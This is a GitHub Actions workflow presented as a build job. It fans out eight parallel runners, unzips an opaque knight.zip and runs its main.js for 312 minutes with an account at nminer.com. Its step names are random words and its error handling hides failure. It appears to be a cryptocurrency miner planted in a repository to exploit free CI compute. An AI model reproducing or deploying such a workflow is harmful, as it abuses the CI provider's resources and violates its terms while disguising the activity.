name: knight
on:
  push:
    branches: [ "main" ]
    paths:
      - "knight.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip knight.zip
        run: |
          sudo apt install -y unzip
          unzip knight.zip

      - name: huzzah jaggedly first tame
        run: |
          npm install --ignore-scripts
          timeout 312m node main.js mathsubhas10@nminer.com || echo "knight executed"